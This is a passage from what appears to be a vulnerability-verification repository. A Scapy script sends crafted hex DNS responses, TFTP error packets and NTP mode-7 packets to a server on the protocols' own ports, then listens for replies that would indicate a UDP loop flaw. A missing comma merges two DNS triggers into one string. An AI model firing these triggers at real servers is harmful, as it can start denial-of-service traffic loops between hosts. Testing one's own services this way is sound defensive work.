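    proto_port = 69             # 53 for DNS, 123 for NTP, 69 for TFTP

    # Capture anything the tested server sends back while the triggers are in flight.
    # For TFTP you may want to drop the "src port" clause, since some implementations
    # reply from a random source port (see the note above).
    replies = sniff(filter="udp and src host %s and src port %d" % (server_ip, proto_port),
                    timeout=30)
    print("%d response packet(s) observed" % len(replies))
    for pkt in replies:
        print(pkt.summary())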
-------------------------------------------------------------------------------- /verify/simple_verify.py: -------------------------------------------------------------------------------- 1 | DNS_triggers = [ 2 | '860c81000001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d00000100010001517f000401020304', 3 | '697481010001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d00000100010000ffa8000401020304', 4 | 'fb8e81020001000000000000076578616d706c6503636f6d0000010001c00c00010001000000950004acd91344', 5 | 'a74581800001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304c00c00010001000000000004ade623c5', 6 | '75a281800001000100010000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304076578616d706c6503636f6d000002000100015180001401610c69616e612d73657276657273036e657400', 7 | 'a74581800001000100010001076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304076578616d706c6503636f6d000002000100000708001401610c69616e612d73657276657273036e65740001610c69616e612d73657276657273036e6574000001000100000708000401020304' 8 | '860c818000010001000d000d076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304000002000100032d90001401620c726f6f742d73657276657273036e657400000002000100032d90001401670c726f6f742d73657276657273036e657400000002000100032d900014016c0c726f6f742d73657276657273036e657400000002000100032d900014016d0c726f6f742d73657276657273036e657400000002000100032d90001401650c726f6f742d73657276657273036e657400000002000100032d90001401660c726f6f742d73657276657273036e657400000002000100032d90001401690c726f6f742d73657276657273036e657400000002000100032d90001401680c726f6f742d73657276657273036e657400000002000100032d90001401610c726f6f742d73657276657273036e657400000002000100032d900014016a0c726f6f742d73657276657273036e657400000002000100032d900014016b0c726f6f742d73657276657273036e657400000002000100032d90001401640c726f6f742d73657276657273036e657400000002000100032d90001401630c726f6f742d73657276657273036e65740001620c726f6f742d73657276657273036e6574000001000100078b000004c7090ec901670c726f6f742d73657276657273036e6574000001000100013f420004c0702404016c0c726f6f742d73657276657273036e657400000100010000ccf20004c707532a016d0c726f6f742d73657276657273036e65740000010001000798450004ca0c1b2101650c726f6f742d73657276657273036e65740000010001000038440004c0cbe60a01660c726f6f742d73657276657273036e657400000100010007c5220004c00505f101690c726f6f742d73657276657273036e65740000010001000713640004c024941101680c726f6f742d73657276657273036e657400000100010004c16f0004c661be3501610c726f6f742d73657276657273036e65740000010001000793600004c6290004016a0c726f6f742d73657276657273036e65740000010001000899c40004c03a801e016b0c726f6f742d73657276657273036e65740000010001000713640004c1000e8101640c726f6f742d73657276657273036e657400000100010002c0e30004c7075b0d01630c726f6f742d73657276657273036e6574000001000100069bb20004c021040c', 9 | '697481810001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d00000100010000ffb5000401020304', 10 | '411e81820001000000000000076578616d706c6503636f6d0000010001', 11 | '163481820001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304', 12 | '860c85800001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304', 13 | 'a74580800001000100000000076578616d706c6503636f6d0000010001076578616d706c6503636f6d000001000100015180000401020304' 14 | ] 15 | 16 | 
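# (The DNS triggers above are pre-built responses and error messages for the name
#  "example.com"; a correctly behaving server should silently ignore them, so any
#  answer they provoke is exactly what this verifier looks for. The TFTP and NTP
#  trigger lists below follow the same idea.)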
TFTP_triggers = [ 17 | '000000036e616d65696e76616c69642072657175657374', 18 | '000500004163636573732076696f6c6174696f6e00', 19 | '00050004496c6c6567616c2054465450206f7065726174696f6e', 20 | '000500044261642046696c656e616d6500', 21 | '00050004340000', 22 | '00050005496c6c6567616c2054494400' 23 | ] 24 | 25 | 26 | NTP_triggers = [ 27 | '9700060010000000', 28 | '9f00060010000000', 29 | '9f001a0e10000000', 30 | '97001a0e30000000', 31 | '9f00203410000000', 32 | '9700203430000000', 33 | '9f000a0010000000', 34 | '97000a0030000000' 35 | ] 36 | 37 | 38 | 39 | import sys 40 | import time 41 | from scapy.all import * 42 | 43 | if __name__ == '__main__': 44 | if len(sys.argv)!=3: 45 | print("Usage:","python3 simple_verify.py ") 46 | exit(-1) 47 | 48 | proto = sys.argv[1] 49 | server_ip = sys.argv[2] 50 | ip_hdr = IP(dst=server_ip) 51 | 52 | if proto.lower()=='dns': 53 | udp_hdr = UDP(sport=53,dport=53) 54 | for load in DNS_triggers: 55 | send(ip_hdr/udp_hdr/bytes.fromhex(load)) 56 | time.sleep(0.5) 57 | elif proto.lower()=='ntp': 58 | udp_hdr = UDP(sport=123,dport=123) 59 | for load in NTP_triggers: 60 | send(ip_hdr/udp_hdr/bytes.fromhex(load)) 61 | time.sleep(0.5) 62 | elif proto.lower()=='tftp': 63 | udp_hdr = UDP(sport=69,dport=69) 64 | for load in TFTP_triggers: 65 | send(ip_hdr/udp_hdr/bytes.fromhex(load)) 66 | time.sleep(0.5) 67 | 68 | 69 | 70 | --------------------------------------------------------------------------------
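
To inspect what any of the trigger payloads in ```verify/simple_verify.py``` actually contain before sending them, they can be dissected back into protocol fields with Scapy. A minimal sketch, assuming it is run from the ```verify``` directory (importing ```simple_verify``` only defines the trigger lists, because the send logic sits behind the ```__main__``` guard):

    from scapy.all import DNS
    from simple_verify import DNS_triggers, NTP_triggers, TFTP_triggers

    # Dissect the first DNS trigger into its header flags and resource records.
    DNS(bytes.fromhex(DNS_triggers[0])).show()

    print(len(DNS_triggers), "DNS,", len(NTP_triggers), "NTP,", len(TFTP_triggers), "TFTP triggers loaded")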